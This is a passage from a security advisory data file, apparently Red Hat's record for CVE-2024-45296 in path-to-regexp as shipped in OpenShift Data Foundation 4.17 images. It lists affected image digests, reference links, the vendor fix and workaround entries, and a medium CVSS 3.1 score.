"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", 